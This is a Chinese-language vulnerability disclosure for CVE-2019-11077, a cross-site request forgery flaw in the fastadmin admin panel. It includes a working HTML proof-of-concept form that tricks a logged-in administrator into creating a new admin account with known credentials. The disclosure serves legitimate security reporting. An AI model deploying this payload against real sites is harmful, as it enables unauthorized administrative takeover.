CVE中文申请站

CVE-2019-11077:fastadmin V1.0.0.20190111_beta存在CSRF漏洞

一、漏洞摘要

漏洞名称: fastadmin V1.0.0.20190111_beta存在CSRF漏洞
上报日期: 2019-04-08
漏洞发现者: Yu Yang
产品首页: https://www.fastadmin.net
软件链接: https://www.fastadmin.net
版本: V1.0.0.20190111_beta
CVE编号: CVE-2019-11077


二、漏洞概述

在登录管理员后台后发现可以添加管理员用户
1.png
添加管理员正常的流程如下
2.png
下面为添加用户过程中的抓包的报文,可以看见没有csrf_token等防护措施
3.png
根据这些所得到的信息,我们就可以伪造html表单,并欺骗管理员点击,最后达到添加管理员用户的目的

三、利用代码

   <html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.242.128/fastadmin/public/admin/auth/admin/add?dialog=1" method="POST">
      <input type="hidden" name="group&#91;&#93;" value="1" />
      <input type="hidden" name="row&#91;username&#93;" value="admin1" />
      <input type="hidden" name="row&#91;email&#93;" value="test&#64;test&#46;com" />
      <input type="hidden" name="row&#91;nickname&#93;" value="admin1" />
      <input type="hidden" name="row&#91;password&#93;" value="admin1" />
      <input type="hidden" name="row&#91;status&#93;" value="normal" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

模拟管理员点击伪造的页面 ,查看效果
4.png
页面跳转后,发现管理员用户添加成功
5.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/191/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11077
exploit-db:发布中